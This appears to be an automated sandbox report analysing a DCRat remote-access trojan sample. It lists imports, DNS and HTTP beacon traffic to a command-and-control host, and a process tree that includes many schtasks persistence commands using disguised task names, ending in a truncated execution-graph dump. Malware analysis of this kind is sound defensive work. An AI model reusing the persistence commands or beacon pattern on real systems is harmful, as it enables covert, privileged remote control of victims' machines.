                KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                Language of compilation system | Country where language is spoken
                English | United States
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jun 17, 2024 06:07:09.745145082 CEST | 49731 | 80 | 192.168.2.4 | 185.26.122.81
                Jun 17, 2024 06:07:09.751105070 CEST | 80 | 49731 | 185.26.122.81 | 192.168.2.4
                Jun 17, 2024 06:07:09.751220942 CEST | 49731 | 80 | 192.168.2.4 | 185.26.122.81
                Jun 17, 2024 06:07:09.751903057 CEST | 49731 | 80 | 192.168.2.4 | 185.26.122.81
                Jun 17, 2024 06:07:09.756707907 CEST | 80 | 49731 | 185.26.122.81 | 192.168.2.4
                Jun 17, 2024 06:07:10.628580093 CEST | 80 | 49731 | 185.26.122.81 | 192.168.2.4
                Jun 17, 2024 06:07:10.648617983 CEST | 49731 | 80 | 192.168.2.4 | 185.26.122.81
                Jun 17, 2024 06:07:10.653553009 CEST | 80 | 49731 | 185.26.122.81 | 192.168.2.4
                Jun 17, 2024 06:07:10.914865017 CEST | 80 | 49731 | 185.26.122.81 | 192.168.2.4
                Jun 17, 2024 06:07:10.927247047 CEST | 49731 | 80 | 192.168.2.4 | 185.26.122.81
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jun 17, 2024 06:07:09.641362906 CEST | 60821 | 53 | 192.168.2.4 | 1.1.1.1
                Jun 17, 2024 06:07:09.737128019 CEST | 53 | 60821 | 1.1.1.1 | 192.168.2.4
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Jun 17, 2024 06:07:09.641362906 CEST | 192.168.2.4 | 1.1.1.1 | 0x8ee4 | Standard query (0) | host1871899.hostland.pro | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Jun 17, 2024 06:07:09.737128019 CEST | 1.1.1.1 | 192.168.2.4 | 0x8ee4 | No error (0) | host1871899.hostland.pro | | 185.26.122.81 | A (IP address) | IN (0x0001) | false
                • host1871899.hostland.pro
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49731 | 185.26.122.81 | 80 | 6884 | C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe
                Timestamp | Bytes transferred | Direction | Data
                Jun 17, 2024 06:07:09.751903057 CEST | 400 | OUT | GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: host1871899.hostland.pro
                Connection: Keep-Alive
                Jun 17, 2024 06:07:10.628580093 CEST | 351 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Jun 2024 04:07:10 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 146
                Connection: keep-alive
                Status: 403 Forbidden by IP restrictions
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Jun 17, 2024 06:07:10.648617983 CEST | 376 | OUT | GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: host1871899.hostland.pro
                Jun 17, 2024 06:07:10.914865017 CEST | 351 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Jun 2024 04:07:10 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 146
                Connection: keep-alive
                Status: 403 Forbidden by IP restrictions
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

                Target ID:0
                Start time:00:06:55
                Start date:17/06/2024
                Path:C:\Users\user\Desktop\DFpUKTL6kg.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\DFpUKTL6kg.exe"
                Imagebase:0x9f0000
                File size:1'164'929 bytes
                MD5 hash:23A1767D4E77693BD46F3ABFCF10E4D7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:00:06:56
                Start date:17/06/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe"
                Imagebase:0x90000
                File size:147'456 bytes
                MD5 hash:FF00E0480075B095948000BDC66E81F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:2
                Start time:00:07:05
                Start date:17/06/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "
                Imagebase:0x240000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:00:07:05
                Start date:17/06/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:00:07:05
                Start date:17/06/2024
                Path:C:\chainSurrogate\browsersvc.exe
                Wow64 process (32bit):false
                Commandline:"C:\chainSurrogate\browsersvc.exe"
                Imagebase:0xc30000
                File size:847'872 bytes
                MD5 hash:05CF6D069F5B66212AF39C9D6C440CCE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 88%, ReversingLabs
                • Detection: 69%, Virustotal, Browse
                Reputation:low
                Has exited:true

                Target ID:5
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:13
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:14
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:15
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:16
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:17
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:18
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:19
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:20
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:21
                Start time:00:07:06
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:22
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:23
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:24
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:25
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:26
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:27
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:28
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:29
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:30
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:31
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:32
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:33
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:34
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:35
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe"
                Imagebase:0xe50000
                File size:847'872 bytes
                MD5 hash:05CF6D069F5B66212AF39C9D6C440CCE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 88%, ReversingLabs
                • Detection: 69%, Virustotal
                Has exited:true


                  Execution Graph

                  Execution Coverage:9.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.4%
                  Total number of Nodes:1465
                  Total number of Limit Nodes:26
                  execution_graph: rendered call graph of the sample (node-ID and edge dump of API call sites, e.g. TlsAlloc, LoadLibraryExW/GetProcAddress, IsDebuggerPresent-style checks, schtasks/ShellExecuteExW launches; not reproducible as text, see the graph view in the report)
23755->23758 23757 9f8c4c 23757->23762 24017 9f1f94 74 API calls 23757->24017 23772 9f8cd9 23758->23772 23760 9f8c62 24018 9f7061 75 API calls 23760->24018 23762->23752 23763 9f8d9c 23764 9f8efd 23763->23764 23765 9f8df7 23763->23765 23769 9f8f0f 23764->23769 23770 9f8f23 23764->23770 23786 9f8e27 23764->23786 23766 9f8e69 23765->23766 23768 9f8e07 23765->23768 23767 9f826a CharUpperW 23766->23767 23773 9f8e84 23767->23773 23774 9f8e4d 23768->23774 23780 9f8e15 23768->23780 23775 9f92e6 121 API calls 23769->23775 23771 a02c42 75 API calls 23770->23771 23776 9f8f3c 23771->23776 23772->23763 24019 9f9b21 SetFilePointer GetLastError SetEndOfFile 23772->24019 23781 9f8ead 23773->23781 23782 9f8eb4 23773->23782 23773->23786 23774->23786 24021 9f7907 108 API calls 23774->24021 23775->23786 24024 a028f1 121 API calls 23776->24024 24020 9f1f94 74 API calls 23780->24020 24022 9f7698 84 API calls __except_handler4 23781->24022 24023 9f9224 94 API calls __EH_prolog 23782->24023 23791 9f904b 23786->23791 24025 9f1f94 74 API calls 23786->24025 23788 9f9156 23790 9fa444 4 API calls 23788->23790 23788->23798 23789 9f9104 23999 9f9d62 23789->23999 23792 